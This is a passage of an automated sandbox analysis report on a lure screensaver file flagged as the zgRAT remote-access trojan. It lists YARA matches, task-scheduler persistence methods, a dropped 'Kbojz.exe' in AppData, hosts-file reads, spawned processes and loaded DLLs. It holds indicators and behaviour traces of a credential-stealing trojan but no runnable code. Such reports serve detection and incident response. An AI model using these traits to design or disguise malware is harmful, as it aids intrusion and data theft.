Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_01FD4488	4_2_01FD4488
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_01FD4478	4_2_01FD4478
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_02014798	4_2_02014798
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_020307C0	4_2_020307C0
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_02039B28	4_2_02039B28
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_02039B38	4_2_02039B38
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_020307B0	4_2_020307B0
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_0203A124	4_2_0203A124
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_04E0B4A0	4_2_04E0B4A0
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_04E0EF80	4_2_04E0EF80
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_04E0C698	4_2_04E0C698
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_04E0B7C7	4_2_04E0B7C7
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_04E00040	4_2_04E00040
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_04E0001F	4_2_04E0001F
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_04E08168	4_2_04E08168
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_04E08178	4_2_04E08178
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_05400040	4_2_05400040
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_05400027	4_2_05400027
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_0721D248	4_2_0721D248
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_0721C6A0	4_2_0721C6A0
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_07200007	4_2_07200007
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_07200040	4_2_07200040

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Static PE information: invalid certificate

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.32afd50.5.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.51b0000.10.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winSCR@9/24@61/3

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

File created: C:\Users\user\AppData\Roaming\Kbojz.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Mutant created: \Sessions\1\BaseNamedObjects\f6f8b153ecbd01c8

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

File created: C:\Users\user\AppData\Local\Temp\Buyeg.tmpdb

Jump to behavior

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

File read: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr "C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr" /S
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process created: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr "C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Process created: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr "C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Process created: C:\Users\user\AppData\Roaming\Kbojz.exe "C:\Users\user\AppData\Roaming\Kbojz.exe"	Jump to behavior

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: rpcrtremote.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: wbemcomn2.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: ntdsapi.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Section loaded: rtutils.dll
